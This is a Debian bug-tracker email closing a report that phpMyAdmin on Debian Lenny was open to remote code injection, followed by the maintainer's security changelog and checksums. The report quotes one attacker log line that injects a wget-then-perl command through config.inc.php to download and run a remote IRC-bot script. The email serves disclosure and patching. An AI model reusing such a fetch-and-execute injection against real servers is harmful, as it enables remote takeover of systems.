Your message dated Sun, 25 Oct 2009 19:57:41 +0000
with message-id <e1n29dh-0001sy...@ries.debian.org>
and subject line Bug#535044: fixed in phpmyadmin 4:2.11.8.1-5+lenny3
has caused the Debian Bug report #535044,
regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
535044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535044
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole
Hi,
After looking at my logs, I did notice a lot of attempts to break in
phpmyadmin through the following kind of url:
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
//phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&;
It seems PHPMyAdmin shipped with Lenny is still vulnerable to this
remote exploit
It is basically an IRC bot
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores)
Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2 1.5.24 Debian configuration management sy
ii libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii perl 5.10.0-19 Larry Wall's Practical Extraction
ii php5 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-cgi 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii php5-mcrypt 5.2.6.dfsg.1-1+lenny3 MCrypt module for php5
ii php5-mysql 5.2.6.dfsg.1-1+lenny3 MySQL module for php5
Versions of packages phpmyadmin recommends:
ii apache2 2.2.9-10+lenny3 Apache HTTP Server metapackage
ii apache2-mpm-prefor 2.2.9-10+lenny3 Apache HTTP Server - traditional n
ii php5-gd 5.2.6.dfsg.1-1+lenny3 GD module for php5
Versions of packages phpmyadmin suggests:
ii mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries
-- debconf information:
phpmyadmin/setup-username: admin
* phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:2.11.8.1-5+lenny3
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz
phpmyadmin_2.11.8.1-5+lenny3.dsc
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc
phpmyadmin_2.11.8.1-5+lenny3_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 535...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thijs Kinkhorst <th...@debian.org> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Sun, 25 Oct 2009 12:30:40 +0100
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:2.11.8.1-5+lenny3
Distribution: stable-security
Urgency: high
Maintainer: Thijs Kinkhorst <th...@debian.org>
Changed-By: Thijs Kinkhorst <th...@debian.org>
Description:
phpmyadmin - MySQL web administration tool
Closes: 535044 543460 552194
Changes:
phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low
.
* Correct some documentation issues of new script.
.
phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high
.
* Upload to stable to fix security issues.
* Fixes XSS and SQL injection (Closes: #552194).
[PMASA-2009-6, CVE-2009-3696, CVE-2009-3697]
* Allow saving of configuration from setup script only after explicit action
from administrator (Closes: #535044, #543460).
Checksums-Sha1:
104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc
e73e24d04b0c73386de7ae4e112227d17eae7d98 63773
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
c90b5b5168330a0a8e4eeba1c0aea405e7e1a472 2883628
phpmyadmin_2.11.8.1-5+lenny3_all.deb
Checksums-Sha256:
7d53fc216fd8b99ea440b72870ff018527b189cce5242618e4baeb2853123ff2 1547
phpmyadmin_2.11.8.1-5+lenny3.dsc
e5fc26908652779a12d91652ac2c270c583b1922a338139b9a231cee910911bd 63773
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
ae37df4ffc3f6f8c1365d589edd8a255a37ddc1d97b0e9ea0752db72d3a9d7d3 2883628
phpmyadmin_2.11.8.1-5+lenny3_all.deb
Files:
db7c29dbd8ad5758ea8283ebbde9c611 1547 web extra
phpmyadmin_2.11.8.1-5+lenny3.dsc
a3c38a698e954534517a81570e9fc9fa 63773 web extra
phpmyadmin_2.11.8.1-5+lenny3.diff.gz
da6a70575f8ae6608910a1c5aaf81f1c 2883628 web extra
phpmyadmin_2.11.8.1-5+lenny3_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBAgAGBQJK5DiKAAoJECIIoQCMVaAcUOsH/iW+RHo9EJjjiuBmz6/T/quz
TxeSQiporVxM2ibMcdU8Xa5KecrQxwkAU5gtzdusoe6Xe+Tr8twgch2T1pl/mqmO
vIpZrLrnwsr+Pb5ofH1jpB5FcIc//GcJ81gQ9y7Vf54Dj2j1tZ1iVc+ViWrIhRBC
1bLKP4UXs6MnC2QHa6agIoOliwuD1FJMRtn4RRe9emV6ReBXno3x0MvJULlxE0C7
aVdN9pd05bf8NQfl9Gk+QqimQqNuQZE/PNdSl+XuzIaY0BBBvZEYq7J3VgEsINNU
Mze8qQKSdXEbNcDbF/LyfRwNo1LYcygg06P0lRI8chML8To7yHHq7BuGFmFToNA=
=fYxY
-----END PGP SIGNATURE-----
--- End Message ---
